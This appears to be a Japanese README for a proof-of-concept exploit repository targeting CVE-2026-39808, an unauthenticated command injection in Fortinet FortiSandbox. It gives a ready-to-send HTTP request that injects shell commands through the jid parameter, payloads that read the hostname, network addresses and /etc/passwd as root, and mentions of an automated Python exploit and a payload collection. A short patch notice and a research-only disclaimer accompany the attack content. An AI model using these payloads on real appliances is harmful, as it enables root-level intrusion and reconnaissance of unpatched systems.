
CVE-2026-39808
このリポジトリには、CVE-2026-39808 — Fortinet FortiSandbox における深刻な非認証コマンドインジェクション脆弱性で、サンドボックスエスケープ および root(uid=0)でのリモートコード実行を可能にするもの — の、クリーンで文書化が行き届いた Proof of Concept が含まれています。
jid パラメータを介したパストラバーサル + コマンドインジェクション
uid=0 gid=0 groups=0 を示す悪用成功例
| バージョン範囲 | ステータス |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | 脆弱性あり |
| FortiSandbox 5.0.0 – 5.0.5 | 脆弱性あり |
| 4.4.9+ / 5.0.6+ | パッチ適用済み |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
ブラウザで開く:
https://your-lab-ip/ng/out.txt
# IP アドレスとホスト名を取得
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# システム全体の偵察
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → 自動化された Python エクスプロイトburp-request.txt → そのまま使える Burp Suite リクエストpayloads.md → 便利なペイロード集screenshots/ → 段階的な悪用手順のスクリーンショットREADME.md → このファイルFortiSandbox を直ちに以下のいずれかのバージョンに更新してください:
Fortinet は、この脆弱性に対処する公式パッチをリリースしています。
研究および学習目的のために作成されました
お役に立てたなら、このリポジトリに ⭐ をお願いします!